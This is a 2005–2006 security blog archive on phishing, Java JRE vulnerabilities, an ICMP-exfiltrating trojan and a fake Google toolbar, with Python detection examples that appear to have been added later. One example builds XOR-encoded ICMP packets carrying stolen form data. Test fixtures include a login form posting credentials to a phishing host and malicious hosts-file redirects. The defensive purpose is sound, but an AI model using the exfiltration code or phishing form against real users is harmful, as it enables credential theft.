The directory holding this accumulated booty was visible to anybody who looked into the HTML source, and the file containing the user information could be downloaded by anyone. These unfortunate victims were now in the public domain. It's common for phishing drop boxes to be located in hard-to-reach jurisdictions. Because this one was in the United States, there was hope that the matter could be resolved in short order.

A number of the users in our security forums attempted to contact the web host, iPowerWeb, in an attempt to get them to shut this site down. However, users were shocked to find that the provider had positively no interest in mitigating the damage of this phishing operation.

One of our resident security experts informs us they were told that since the phished site was hosted elsewhere, nothing could be done. The easily accessible treasure trove of user information was "just a file of names," users were told. "They would not even consider looking at the MySpace page in order to reach their own judgement," one security expert tells us. "They simply did not care."

Other resident phish-trackers got the same response from iPowerWeb and were told there simply wasn't ample evidence this was even a phish. Users pointed out that the login.php script clearly involved the MySpace login page, and that the purported website fashion-infos.com had no obvious connection to MySpace. None of this information had any impact.

A long six hours later, the drop-box site was finally removed. We're unsure what triggered the hosting provider to finally take action, but we're curious about how many new users the phish grabbed during those six hours.


This is a must read for anyone who uses MySpace. Shame on the hosting company for the reckless disregard it showed toward MySpace users.
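The tell in the attack above is structural: a password form sitting on a myspace.com page whose action posts to somebody else's host. That is something a page scanner, a proxy or a browser extension can check mechanically. The following is an added example, not code from DSL Reports or MySpace; the sample page is constructed to mirror the overlay the article describes (fashion-infos.com/login.php is the drop host the article names, the rest of the markup is made up), and the "last two labels" site rule is a stated simplification.

```python
"""Flag login forms whose action posts to a different site than the page itself.
Added example, not from DSL Reports or MySpace; the sample page below is constructed
to mirror the overlay the article describes (fashion-infos.com/login.php is the drop
host named in the article; everything else is made up)."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class FormCollector(HTMLParser):
    """Record every <form>: its action, method, and whether it contains a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): v for k, v in attrs}
        if tag == "form":
            self._current = {"action": a.get("action") or "",
                             "method": (a.get("method") or "get").lower(),
                             "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "text").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def site_of(host: str) -> str:
    """Registrable site = last two DNS labels (assumption: a simplification that is
    wrong for suffixes such as co.uk; use a public-suffix list in production)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def find_credential_leaks(page_url: str, html: str) -> list:
    """Return the password-bearing forms whose submit target is off-site."""
    parser = FormCollector()
    parser.feed(html)
    origin = site_of(urlsplit(page_url).hostname or "")
    leaks = []
    for form in parser.forms:
        if not form["has_password"]:
            continue
        # An empty action submits to the page itself; relative ones resolve against it.
        target = urljoin(page_url, form["action"]) if form["action"] else page_url
        target_host = urlsplit(target).hostname or ""
        if site_of(target_host) != origin:
            leaks.append({"action": target, "method": form["method"],
                          "target_site": site_of(target_host)})
    return leaks


# Constructed sample: a profile page whose injected HTML overlays a fake login box.
SAMPLE_PAGE_URL = "http://www.myspace.com/someprofile"
SAMPLE_HTML = """<html><body>
<div style="position:absolute;top:0;left:0;width:100%;height:100%;background:#fff">
  <form method="post" action="http://fashion-infos.com/login.php">
    E-mail: <input type="text" name="email">
    Password: <input type="password" name="password">
    <input type="submit" value="Login">
  </form>
</div>
<form method="get" action="/search"><input type="text" name="q"></form>
</body></html>"""

if __name__ == "__main__":
    for leak in find_credential_leaks(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print("credential form posts off-site:", leak)
```

The comparison is done on the registrable site rather than the full hostname on purpose: a real login form on a myspace.com page legitimately posts to login.myspace.com, and that must not be flagged, while fashion-infos.com must be.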

October 2, 2006

"0-day" vulnerabilities in Firefox

From SecuriTeam Blogs
"It seems like Internet Explorer has been given a lot of heat lately with a rash of 0day vulnerabilities, and if you do use IE then do yourself a favor and visit ZERT, but has the time come for Firefox to shine as well? If you take a brief look at the list of publicly known vulnerabilities in Firefox it should come as no surprise that there will naturally be a slew of undisclosed vulnerabilities as well.

At the ToorCon 2006 conference, Mischa Spiegelmock and Andrew Wbeelsoi made a point out of demonstrating a live exploit running in Firefox 1.5.0.7. Their main motivation was apparently to create bot networks for their personal use, or in their own words - “communication networks for black hats”.

Spiegelmock claims that the Javascript implementation in Firefox is a “complete mess”, stating further that “It is impossible to patch”. Personally, I disagree - though perhaps only on the finer points of those statements. Browsers are inherently insecure by design, not because of any one vendor's particular implementation. Their objective is to retrieve arbitrary textual content from an untrusted network location, parse that text into a set of processing instructions and then render a visual representation of the document. Browsers are semi-compilers with a range of legacy deviations that all add up to enormously complex parsing environments, the perfect hunting ground for vulnerabilities caused by developer oversight. Adding Javascript on top of that only increases the complexity linearly instead of exponentially."

OK, this is not a 0-day vulnerability. A 0-day vuln must also have a Proof of Concept circulating in the wild. More FUD can be read here: Hackers claim zero-day flaw in Firefox
To stop all scripts from running except when you want them to run, install the NoScript add-on for Firefox. It can be found here. The author's page is here. Screenshots can be viewed here.

August 22, 2006

Sun finally admits that previous JRE's WERE vulnerable

Java Plug-in and Java Web Start May Allow Applets and Applications to Run With Unpatched JRE

At the very bottom of the above page it clearly states

Note: It is recommended that affected versions be removed from your system. For more information, see the installation notes on the respective java.sun.com download pages.
Note that this bulletin, issued August 21st, refers to the 1.5.0_05 JRE and prior. This caught my eye:
The Java Plug-in and Java Web Start both allow applets and applications to specify the version of the Java Runtime Environment (JRE) to run with. However, the versions of Java Web Start and the Java Plug-in listed in Section 2 below may allow applets or applications to run with a specified version of the JRE that does not have the latest security fixes.

2. Contributing Factors

* Java Plug-in included with J2SE 5.0 Update 5 and earlier, 1.4.x,
1.3.1, and 1.3.0_02 and later
* Java Web Start included with J2SE 5.0 Update 5 and earlier, and
1.4.2
* Java Web Start 1.2, 1.0.2, 1.0.1, and 1.0


Now they state that
Notes:
1. Prior to 5.0 Update 6, an applet could specify the version of the JRE on which it would run. With 5.0 Update 6 and later installed on the Windows platform, all applets are executed with the latest version of the JRE.
Which is exactly what I've been complaining about since Feb, 2005.
So, in effect, removing any JRE prior to 1.5.0_06 closes the door on malware invoking older, vulnerable runtimes; with 5.0 Update 6 or later installed, applets on Windows can no longer pick the JRE version they run on.

The only reason one would remove 1.5.0_06 or v.07 would be to conserve disk space, according to Sun.

I may be a tad "crazy", but I ain't dumb, Sun. ( Or is that dim sum ;)

August 12, 2006

Data Stolen via ICMP

Websense® Security Labs™ has received a sample of a new phishing Trojan that delivers stolen information back to the attacker via ICMP packets. Upon infection of a victim's computer, the Trojan will install itself as an Internet Explorer Browser Helper Object (BHO). The BHO then waits for the user to post personal information to a monitored website. As this information is entered by the user, it is captured by the BHO and sent back to the attacker. The method of network transport used by the attacker makes this Trojan unique. Typically, keyloggers of this type will send the stolen information back to the attacker via email or HTTP POST, which can appear suspicious. Instead, this Trojan encodes the data with a simple XOR algorithm before placing it into the data section of an ICMP ping packet.
Original article here : http://www.websense.com/securitylabs/alerts/alert.php?AlertID=570

( The Windows Firewall in XP SP2 filters inbound traffic only; it does not block outbound ICMP, so echo requests carrying stolen data leave the box unhindered. )
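What makes this channel work is that an outbound echo request with an odd payload looks, to a host firewall, exactly like a ping. The following is an added example, not Websense's sample or analysis: it models the attacker side (stolen form data, repeating-key XOR, one echo request per chunk), the defender side (flag echo requests whose payload is not one of the known ping clients') and the analyst side (once the key is pulled from the BHO, the "encoding" is undone in one line). The key, chunk size, identifier/sequence values and the two ping-client baselines are assumptions; the stolen data is constructed.

```python
"""Model of the channel Websense describes (form data XOR-encoded into ICMP echo
requests) next to a detector for it. Added example, not Websense's sample: the key,
chunk size, id/seq values and the two 'known ping client' baselines are assumptions."""
import struct
from typing import Dict, List

ICMP_ECHO_REQUEST = 8
# Baselines (assumption: only these ping clients legitimately send echo requests here).
WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"   # XP ping.exe, 32 bytes
LINUX_PING_PATTERN = bytes(range(0x10, 0x40))                 # iputils: 8-byte timestamp, then 0x10..0x3f


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum; over a complete, valid packet it yields 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the 'simple XOR algorithm' of the alert. Applying it twice undoes it."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_echo(payload: bytes, ident: int = 0x1234, seq: int = 1) -> bytes:
    """ICMP header (type 8, code 0, checksum, identifier, sequence) followed by the payload."""
    header = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, csum, ident, seq) + payload


def exfil_packets(stolen: bytes, key: bytes, chunk: int = 32) -> List[bytes]:
    """Attacker side: one echo request per XOR-encoded chunk, sequence numbers 1, 2, 3..."""
    return [build_echo(xor_bytes(stolen[i:i + chunk], key), seq=n)
            for n, i in enumerate(range(0, len(stolen), chunk), start=1)]


def looks_like_real_ping(payload: bytes) -> bool:
    if payload == WINDOWS_PING_PAYLOAD:
        return True
    return len(payload) == 56 and payload[8:] == LINUX_PING_PATTERN


def inspect_echo(packet: bytes) -> Dict[str, object]:
    """Defender side: an echo request whose payload is not a ping client's is worth a look."""
    typ, _code, _csum, _ident, seq = struct.unpack("!BBHHH", packet[:8])
    payload = packet[8:]
    if typ != ICMP_ECHO_REQUEST:
        return {"seq": seq, "suspicious": False, "reasons": ["not an echo request"]}
    reasons = []
    if icmp_checksum(packet) != 0:
        reasons.append("bad checksum")
    if not looks_like_real_ping(payload):
        reasons.append("%d-byte payload matches no known ping client" % len(payload))
        if any(b < 0x20 or b > 0x7E for b in payload):
            reasons.append("non-printable bytes in payload")
    return {"seq": seq, "suspicious": bool(reasons), "reasons": reasons}


def recover(packets: List[bytes], key: bytes) -> bytes:
    """Analyst side: with the key (it ships inside the BHO) the 'encoding' falls away."""
    ordered = sorted(packets, key=lambda p: struct.unpack("!H", p[6:8])[0])
    return b"".join(xor_bytes(p[8:], key) for p in ordered)


if __name__ == "__main__":
    stolen = b"user=alice&pass=hunter2&card=4111111111111111"   # constructed sample
    pkts = exfil_packets(stolen, key=b"\x5a")
    for p in pkts + [build_echo(WINDOWS_PING_PAYLOAD)]:
        print(inspect_echo(p))
    print(recover(pkts, b"\x5a"))
```

Two practical points fall out of this. Baselining on the ping client's fixed payload is the cheap, high-signal check: a 23-byte or 45-byte echo payload from a Windows box is not ping.exe, whatever the bytes say. And because a single-byte XOR leaves printable text printable, an "is it printable" heuristic on its own would have missed the sample above; the length/pattern mismatch is what catches it.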

December 2, 2005

Highly Critical : Sun Java JRE Sandbox Security Bypass Vulnerabilities

Once again, Sun drops the ball. Besides the ongoing issue with the Java automatic updating mechanism, Secunia issued this Highly Critical alert on 11/29/05: Sun Java JRE Sandbox Security Bypass Vulnerabilities

Description:
Some vulnerabilities have been reported in Sun Java JRE (Java Runtime Environment), which can be exploited by malicious people to compromise a user's system.

1) An unspecified error may be exploited by a malicious, untrusted applet to read and write local files or execute local applications.

The vulnerability has been reported in JDK/JRE 5.0 Update 3 and prior on Windows, Solaris and Linux platforms. SDK/JRE 1.4.2_xx and prior, and 1.3.1_xx releases are not affected.

2) Three unspecified errors in the use of "reflection" APIs may be exploited by a malicious, untrusted applet to read and write local files or execute local applications.

The following releases are affected by one or more of the three vulnerabilities on Windows, Solaris and Linux platforms:
* SDK and JRE 1.3.1_15 and prior.
* SDK and JRE 1.4.2_08 and prior.
* JDK and JRE 5.0 Update 3 and prior.

3) An unspecified error in the JMX (Java Management Extensions) implementation included with the JRE may be exploited by a malicious, untrusted applet to read and write local files or execute local applications.

The vulnerability has been reported in JDK/JRE 5.0 Update 3 and prior on Windows, Solaris and Linux platforms. SDK/JRE 1.4.2_xx and prior, and 1.3.1_xx releases are not affected.

Solution:
Update to the fixed versions.

JDK and JRE 5.0:
Update to JDK and JRE 5.0 Update 4 or later.
http://java.sun.com/j2se/1.5.0/download.jsp

SDK and JRE 1.4.x:
Update to SDK and JRE 1.4.2_09 or later.
http://java.sun.com/j2se/1.4.2/download.html

SDK and JRE 1.3.x:
Update to SDK and JRE 1.3.1_16 or later.
http://java.sun.com/j2se/1.3/download.html

Provided and/or discovered by:
The vendor credits Adam Gowdiak.

Original Advisory:
Sun Microsystems:
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102050-1
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102003-1
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102017-1

REMEMBER: The Java automatic update mechanism does NOT uninstall the older, vulnerable versions previously installed. To uninstall them, go to Add/Remove Programs in the Control Panel and click on Remove.
Maybe if Sun bundled some security with their updates instead of the Google Toolbar, then the average User wouldn't need to uninstall older versions.

And, to top it all off, if one goes to Sun's very own Java version checking page, it does NOT report the correct number of the latest version. I tested this on my normal, everyday OS, Win XP Pro, and it claimed the system had the latest version, when in fact it was two versions behind. It had J2SE 1.5.0_04 installed and the latest version, as of today, is 1.5.0_06.

How do you like your Google Toolbar now? Pathetic, Sun, just pathetic.

November 1, 2005

Sun Drops the Ball Again : Sun J2SE Alert

If you haven't already read the previous article on why the Sun Java Auto Update mechanism is inherently insecure and just plain badly coded, then go here: Sun Java (J2SE/JRE) Automatic Update Vulnerability. Seems they've done it again. Just exactly what is their problem? Can they not hire some decent coders? Or do they just not care about possible security vulnerabilities in J2SE?


Sun Alert ID: 101981 (RESOLVED)

Synopsis: GTE CyberTrust Root Certificate Included in Various
Releases of J2SE will Expire on February 23, 2006
Date Released: 24-Oct-2005
Date Closed: 24-Oct-2005

To view this Sun Alert document please go to the following URL:
http://sunsolve.sun.com/search/document.do?assetkey=1-26-101981-1

Windows, Solaris, and Linux Platforms
* J2SE 5.0
* J2SE 1.4.2
* J2SE 1.4.1

> Impact

> A GTE CyberTrust root certificate included in various releases of Java 2 Platform, Standard Edition (listed below) will expire on February 23, 2006. Upon expiration, users of Java applications and applets, deployed with the Java Plug-in or Java Web Start which authenticate using certificates issued by the expiring root certificate may see a security warning dialog box during the authentication process.

> Relief/Workaround

> The security warning dialog box (described in "Symptoms" above) provides the option to grant permissions with the "Grant this session" or "Grant always" buttons. You may run the software by selecting either button. However, please **note that you should not choose these options unless you are prepared to trust the software that you are going to run.**

> Resolution

> The GTE CyberTrust root certificate will not be renewed by the Certification Authority, CyberTrust, Inc. Therefore, there are no software updates from Sun Microsystems, Inc., and you do not need to update your J2SE releases for this expiration.

OK, let's see if we have this one straight. The GTE CyberTrust root certificate will expire February 23, 2006, and CyberTrust will not renew it. So, when going to a website after that date, a website that may or may not be malicious or may have been hacked by a malicious individual, one is supposed to know whether the Java applet that is attempting to load is to be trusted or not.
Pray tell, Sun, how would one determine that?

What's galling is that they absolve themselves of any responsibility in this matter.

Therefore, there are no software updates from Sun Microsystems, Inc., and you do not need to update your J2SE releases for this expiration

EXCUSE ME? Didn't we go down this road before when a Java certificate expired in July and those who had APC PowerChute Business UPSes found out that the Windows Installer would not function due to this?
I do not know for certain that the same issue will arise again, but telling people to determine for themselves whether they should trust running Java inside of Sun's J2SE just shows, once again, Sun's UTTER CONTEMPT FOR THE SECURITY of J2SE Users. Since it's almost impossible to find a link to contact the Java development team, perhaps it's best for concerned Users of Sun's J2SE to contact security-alert@sun.com to express their opinions in this matter.

October 11, 2005

October 2005 Security Release from MS

3 Critical Releases :

Microsoft Security Bulletin MS05-050
Vulnerability in DirectShow Could Allow Remote Code Execution (904706)

Affected Software:
• Microsoft DirectX 7.0 on Microsoft Windows 2000 with Service Pack 4 – Download the update

• Microsoft DirectX 8.1 on Microsoft Windows XP Service Pack 1 and on Microsoft Windows XP with Service Pack 2 – Download the update

• Microsoft DirectX 8.1 on Microsoft Windows XP Professional x64 Edition – Download the update

• Microsoft DirectX 8.1 on Microsoft Windows Server 2003 and on Microsoft Windows Server 2003 with Service Pack 1 – Download the update

• Microsoft DirectX 8.1 on Microsoft Windows Server 2003 for Itanium-based Systems and on Microsoft Windows Server 2003 with SP1 for Itanium-based Systems – Download the update

• Microsoft DirectX 8.1 on Microsoft Windows Server 2003 x64 Edition – Download the update

• Microsoft Windows 98, Microsoft Windows 98 Second Edition (SE), and Microsoft Windows Millennium Edition (ME) –Available on Windows Update and Microsoft Update ONLY


Microsoft Security Bulletin MS05-052
Cumulative Security Update for Internet Explorer (896688)

Affected Software:
• Microsoft Windows 2000 Service Pack 4
• Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2
• Microsoft Windows XP Professional x64 Edition
• Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1
• Microsoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with Service Pack 1 for Itanium-based Systems
• Microsoft Windows Server 2003 x64 Edition
• Microsoft Windows 98, Microsoft Windows 98 Second Edition (SE), and Microsoft Windows Millennium Edition (ME)


Affected Components:
• Internet Explorer 5.01 Service Pack 4 on Microsoft Windows 2000 Service Pack 4 – Download the update

• Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4 or on Microsoft Windows XP Service Pack 1 – Download the update

• Internet Explorer 6 for Microsoft Windows XP Service Pack 2 – Download the update

• Internet Explorer 6 for Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1 – Download the update

• Internet Explorer 6 for Microsoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with SP1 for Itanium-based Systems – Download the update

• Internet Explorer 6 for Microsoft Windows Server 2003 x64 Edition – Download the update

• Internet Explorer 6 for Microsoft Windows XP Professional x64 Edition – Download the update

• Internet Explorer 5.5 Service Pack 2 on Microsoft Windows Millennium Edition - Available on Windows Update and Microsoft Update ONLY

• Internet Explorer 6 Service Pack 1 on Microsoft Windows 98, on Microsoft Windows 98 SE, or on Microsoft Windows Millennium Edition - Available on Windows Update and Microsoft Update ONLY

Microsoft Security Bulletin MS05-051
Vulnerabilities in MSDTC and COM+ Could Allow Remote Code Execution (902400)

Affected Software:
• Microsoft Windows 2000 Service Pack 4 – Download the update

• Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2 – Download the update

• Microsoft Windows XP Professional x64 Edition – Download the update

• Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1 – Download the update

• Microsoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with SP1 for Itanium-based Systems – Download the update

• Microsoft Windows Server 2003 x64 Edition – Download the update

Non-Affected Software:
Microsoft Windows 98, Microsoft Windows 98 Second Edition (SE), and Microsoft Windows Millennium Edition (ME)

There are 3 Critical, 4 Important, and 2 Moderate rated updates for October, 2005:
Microsoft Security Bulletin Summary for October 2005
Please visit the page to learn more about them.

To learn how Microsoft determines the category for
updates, please visit Microsoft Security Response Center Security Bulletin Severity Rating System .

October 7, 2005

Phishers Plant Fake Google Toolbar

From InformationWeek


Phishers are playing off Google's brand name, a security researcher said Wednesday, by flooding IM and IRC with messages that lead to a download of a bogus Google toolbar whose sole purpose is to steal credit card information.
Facetime's senior researcher Chris Boyd warned that two URL links are in circulation over instant messaging (IM) and Internet relay chat (IRC) channels; both links lead the naïve to a page which, among other actions, installs and launches a phony Google toolbar, hijacks the Windows HOSTS file, and adds the anti-spyware program known as "World Antispy." The toolbar, in connection with the rewritten HOSTS file, redirects most Google addresses and pops up a window asking for credit card information.

IMlogic, another IM security vendor, said in its alert that the IM side of the attack was limited to Yahoo Messenger users, and the hack was using some of the same vulnerabilities in Microsoft's Internet Explorer as the infamous CoolWebSearch, the broad name given to a line of sneaky software that has in the past been dubbed "the Ebola of adware." This is the first known instance of a CoolWebSearch-style attack being propagated over an IM network.

Boyd said that Facetime has spotted three variations of the attack, each one exploiting a different vulnerability and installing a slightly different payload.

"Hackers are clearly using new vectors such as IM to take advantage of reputable, trusted brands such as Google," said Boyd in a statement. "Our research finds that this phishing scam is financially motivated by a third party using incredibly elaborate bundles that deliver a rogue Google toolbar with many of the same elements as the real Google toolbar."

The phishing attack is just the latest threat coming in over IM networks. According to IMlogic, the number of IM assaults has jumped by 14 times since the first of the year. In the third quarter alone, IMlogic tracked 10 times the number of IM threats than in all of 2004.

Further reference can be found at : Google Toolbar Whacking - Developing Story

And, this is where the story first broke - Kephyr.com

Perfhost.com - 28 Sep 2005
The perfhost.com video shows how applications are installed without consent, by exploiting a security hole. The following programs appear in the Add/Remove programs dialog: "Google Toolbar for Internet Explorer" and "PremiumSearch StartPage". A short while after I ended the video capture a program called "WorldAntiSpy" also appeared. The following are some of the new entries that appears in the log:

C:\WINDOWS\System32\usbhdctl.exe
O1 - Hosts: 69.31.81.22 www.google.de
O1 - Hosts: 69.31.81.22 www.google.dj
O1 - Hosts: 69.31.81.22 www.google.dk
O1 - Hosts: 69.31.81.22 www.google.es
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program\google\googletoolbar2.dll
O4 - HKLM\..\Run: [apisvc.exe] C:\WINDOWS\System32\apisvc.exe
O4 - Global Startup: WorldAntiSpy.lnk = C:\Program\WorldAntiSpy\WorldAntiSpy.exe

For more details please look in the HijackThis logs (1, 2, 3).

I notified Google Toolbar Support about this issue on the 28th of September 2005. I am convinced Google will track down and stop the individual or company behind the non-consensual toolbar install.

Noted Windows Security MVP Chris Boyd helped break this unfolding story.
They whacked Google!
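The O1 lines in the HijackThis log above are the whole trick: the HOSTS file wins over DNS, so pointing www.google.* at 69.31.81.22 hands the attacker every Google visit without touching the browser's address bar. Checking for that is mechanical. The following is an added example, not Kephyr's or FaceTime's code: it reads either a raw hosts file or HijackThis "O1 - Hosts:" lines, keeps every entry whose target is not loopback or 0.0.0.0, and calls out addresses that swallow several hostnames at once. The sample input is constructed around the 69.31.81.22 entries shown in the log; the 3-name threshold is an assumption.

```python
"""Spot HOSTS-file redirects of well-known domains, from either a raw hosts file
or HijackThis "O1 - Hosts:" lines. Added example, not Kephyr's or FaceTime's code;
the sample lines are constructed around the 69.31.81.22 entries shown in the log above."""
import ipaddress
import re
from collections import defaultdict
from typing import Dict, Iterator, List, Tuple

HJT_O1 = re.compile(r"^O1 - Hosts:\s+(\S+)\s+(\S+)")


def hosts_entries(text: str) -> Iterator[Tuple[str, str]]:
    """Yield (ip, hostname) pairs; comments and blank lines are skipped."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = HJT_O1.match(line)
        if m:
            yield m.group(1), m.group(2).lower()
            continue
        parts = line.split()
        for name in parts[1:]:          # one IP may carry several names per line
            yield parts[0], name.lower()


def is_benign_target(ip_text: str) -> bool:
    """Loopback and 0.0.0.0 are the normal hosts-file targets (local names, ad blocking)."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False                    # garbage where an address should be: look at it
    return ip.is_loopback or ip.is_unspecified


def find_redirects(text: str) -> Dict[str, List[str]]:
    """Map every non-local target address to the names pointed at it."""
    redirected = defaultdict(list)
    for ip, name in hosts_entries(text):
        if not is_benign_target(ip):
            redirected[ip].append(name)
    return dict(redirected)


def hijack_targets(text: str, min_names: int = 3) -> List[str]:
    """Addresses that swallow several hostnames at once: the CoolWebSearch-style pattern.
    A private target carrying a single name (an intranet alias) stays under the threshold."""
    return sorted(ip for ip, names in find_redirects(text).items() if len(names) >= min_names)


# Constructed sample mixing a raw hosts file with HijackThis O1 lines.
SAMPLE_HOSTS = """# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost
10.0.0.5        intranet            # legitimate local alias
0.0.0.0         ads.example.net     # ad-blocking style entry
O1 - Hosts: 69.31.81.22 www.google.de
O1 - Hosts: 69.31.81.22 www.google.dj
O1 - Hosts: 69.31.81.22 www.google.dk
O1 - Hosts: 69.31.81.22 www.google.es
"""

if __name__ == "__main__":
    print(find_redirects(SAMPLE_HOSTS))
    print("hijack targets:", hijack_targets(SAMPLE_HOSTS))
```

The full redirect map is still worth reading by hand: a single off-box entry for a banking or webmail hostname is just as bad as twenty for Google, it simply does not trip the many-names threshold.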

Sun Java (J2SE/JRE) Automatic Update Vulnerability

The Sun Java (J2SE/JRE) Automatic Updater does not uninstall previous versions that have vulnerabilities. In addition, if a User is not aware of this behavior, said User may end up with several Java packages installed. Leaving previous, vulnerable versions installed runs the risk of infection, because malware writers can call them: as Sun's own August 2006 alert quoted earlier on this page confirms, prior to 5.0 Update 6 an applet could name the JRE version it wanted to run on, so a hostile page could simply ask for the old, unpatched one. In plain English, they can utilize them to infest a system with malware such as CoolWebSearch or Trojan.Byte.Verify.

Plus, leaving the previous versions installed consumes disk (hard drive) space. Since each package is over 100 megabytes, this is not a trivial matter. This link is from a thread at the AumHa HijackThis Forum and shows a malware victim who had 3 versions of Sun Java installed and was not even aware of it.

I also received an email from a User worried about the multiple Java versions installed on her system:

There was mention of Sun releasing "Alert Notifications", which I
would like to see. Is there an "email notification" that one can sign
up for? I went to "http://sunsolve.sun.com", but all that I saw was a
EULA; is there something more?
I have the following 6 on my computer; do you recommend removing
any of them?
1) J2SE Runtime Environment 5.0 Update 1
2) " " " " Update 2
3) " " " " Update 4
4) Java 2 Runtime Environment, SE v 1.4.2_06
5) " " " Standard Edition v 1.3.1
6) " " " " " v 1.3.1_02

At over 100 MB per Java package, that means well over 600 MB of the HD was being taken up by six Java installs, five of which should have been uninstalled by the Java Update mechanism.
In February of 2005 I contacted Sun concerning the Auto Updater's insecure and sloppy behavior. Here is their reply
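Answering "which of these do I remove?" by hand means decoding two different naming schemes ("5.0 Update 4" is Sun's marketing name for 1.5.0_04) and checking each against the advisory's fixed levels. The following is an added example, not Sun's code or the blog's, that does both for the reader's six installs above and for the version table in the Secunia advisory quoted in the December 2005 entry (5.0 Update 4, 1.4.2_09, 1.3.1_16). The Add/Remove display names are constructed from the list above with the ditto marks expanded and the exact wording assumed; the fixed-in table is the December 2005 one and must be refreshed against the current advisory before it is relied on.

```python
"""Audit a list of installed Java packages: which one to keep, which to remove,
and which sit below the fixed level in an advisory. Added example, not Sun's code;
the display names are constructed from the reader's list above (ditto marks expanded,
exact wording assumed) and FIXED_IN_DEC_2005 is the Secunia advisory quoted earlier."""
import re
from typing import Dict, List, Optional, Tuple

# "1.4.2_06", "1.3.1" or "5.0 Update 4" style version strings inside a display name.
VERSION_RE = re.compile(r"(\d+\.\d+(?:\.\d+)?)(?:_(\d+)|\s+Update\s+(\d+))?", re.IGNORECASE)

# Minimum fixed update per family from the 11/29/05 Secunia alert (refresh before use).
FIXED_IN_DEC_2005 = {"1.5.0": 4, "1.4.2": 9, "1.3.1": 16}


def parse_java_version(display_name: str) -> Optional[Tuple[str, int]]:
    """Return (family, update), e.g. ("1.5.0", 4); Sun's "5.0" is family 1.5.0."""
    m = VERSION_RE.search(display_name)
    if not m:
        return None
    family, upd_underscore, upd_word = m.groups()
    if family == "5.0":
        family = "1.5.0"
    return family, int(upd_underscore or upd_word or 0)


def _order(version: Tuple[str, int]):
    family, update = version
    return tuple(int(x) for x in family.split(".")), update


def audit(display_names: List[str], fixed_in: Dict[str, int]) -> Dict[str, List[str]]:
    parsed = [(name, parse_java_version(name)) for name in display_names]
    known = [(name, v) for name, v in parsed if v is not None]
    report = {"keep": [], "remove": [], "vulnerable": [], "unknown_family": [],
              "unparsed": [name for name, v in parsed if v is None]}
    if not known:
        return report
    # Only the newest runtime needs to stay; everything else is dead weight and attack surface.
    newest_name, _ = max(known, key=lambda nv: _order(nv[1]))
    report["keep"].append(newest_name)
    for name, (family, update) in known:
        if name != newest_name:
            report["remove"].append(name)
        if family not in fixed_in:
            report["unknown_family"].append(name)
        elif update < fixed_in[family]:
            report["vulnerable"].append(name)
    return report


SAMPLE_INSTALLED = [
    "J2SE Runtime Environment 5.0 Update 1",
    "J2SE Runtime Environment 5.0 Update 2",
    "J2SE Runtime Environment 5.0 Update 4",
    "Java 2 Runtime Environment, SE v1.4.2_06",
    "Java 2 Runtime Environment, Standard Edition v1.3.1",
    "Java 2 Runtime Environment, Standard Edition v1.3.1_02",
]

if __name__ == "__main__":
    for bucket, names in audit(SAMPLE_INSTALLED, FIXED_IN_DEC_2005).items():
        print(bucket, "->", names)
```

Against the December 2005 table the reader's 5.0 Update 4 is the one to keep and the other five are both stale and below the fixed level; against any later advisory on this page even Update 4 drops into the vulnerable bucket, which is the point of refreshing the table rather than trusting a one-time check.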


========================================================================

Hello Steve,

----------------------------------------------------------------------------------------------------------------------------------
> Reading this Sun Alert ID: 57708
> http://sunsolve.sun.com/search/document.do?assetkey=1-26-57708-1

> It states :

> Note: It is recommended that affected versions be removed from your system. For more information, please see the installation notes on the respective java.sun.com download pages.

> Neither page that I went to from the link on java.sun.com download page state that previous vulnerable versions should be uninstalled :
> http://java.com/en/download/help/5000010200.xml
> http://java.com/en/download/help/5000010300.xml

> If a User utilizes the automatic update mechanism of the JRE the previous vulnerable version is left on the system. As I understand it, those previous vulnerable versions can still be called by malware. If this is not the case, please set me straight.
---------------------------------------------------------------------------------------------------------------------------------

You are correct that the previous vulnerable versions can still be called by malware. We forwarded your e-mail along to the Java group and they let us know that they are currently investigating your suggestions of updating the java.com pages and the auto update uninstallation issue and appreciate the feedback. We will follow-up with any further updates.

Best regards,

Sun Security Coordination Team

security-alert@sun.com

========================================================================

After waiting 6 months I sent them another email inquiring whether this issue had been addressed. There was no reply.

Apparently, Sun appreciates the feedback but will not address the issue. Thus, the genesis of this article. Their behavior is not acceptable and shows a cavalier attitude towards the users of Sun Java. Why is Sun not being held accountable? Well, they are now. Concerned Users of Sun Java may want to contact them at the above email address to express their displeasure.

